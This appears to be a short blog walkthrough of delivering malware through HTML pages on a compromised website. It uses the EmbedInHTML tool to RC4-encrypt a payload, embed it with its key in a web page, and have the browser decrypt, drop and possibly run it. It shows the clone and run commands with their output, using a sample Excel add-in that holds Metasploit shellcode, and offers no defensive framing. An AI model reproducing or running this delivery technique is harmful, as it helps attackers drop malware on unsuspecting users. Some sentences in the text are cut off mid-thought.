Recently a colleague asked me an example of how a malware can be spread using simple html pages hosted on a hacked website.
The tool is a script that takes a file, encrypt it using RC4 encryption , and embed it (with the decryption key) into an HTML file generated using a template within the output file.
The resulting HTML can either be browsed by the targeted user or sent as an attachement.
When the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and the file is then presented to the user as if it was being downloaded from the remote site.
Depending on the user’s browser and the file type presented, the file can be automatically opened by the browser.
How to make a simple demo
First, clone the github repository:
$ git clone https://github.com/Arno0x/EmbedInHTML.git Cloning into 'EmbedInHTML'... remote: Counting objects: 27, done. remote: Total 27 (delta 0), reused 0 (delta 0), pack-reused 27 Unpacking objects: 100% (27/27), done.
payloads_examples directory are provided some payload examples.
In my case I’ve used the most simple
calc.xll: an Excel add-in file that contains a metasploit shellcode for x86 processes to launch the
So, just launch the tool for generating the html output, using also th -w options, that opens a webserver in order to serve the generated file:
# python embedInHTML.py -k encodingkey -f ./payloads_examples/calc.xll -o index.htm -w [*] File [./payloads_examples/calc.xll] successfully loaded ! [+] Encrypted input file with key [encodingkey] [*] File [output/index.htm] successfully created ! [+] Starting a web server on port 80 serving files from 'output' directory
Finally, point the browser to the html file:
The file is automatically downloaded and executed.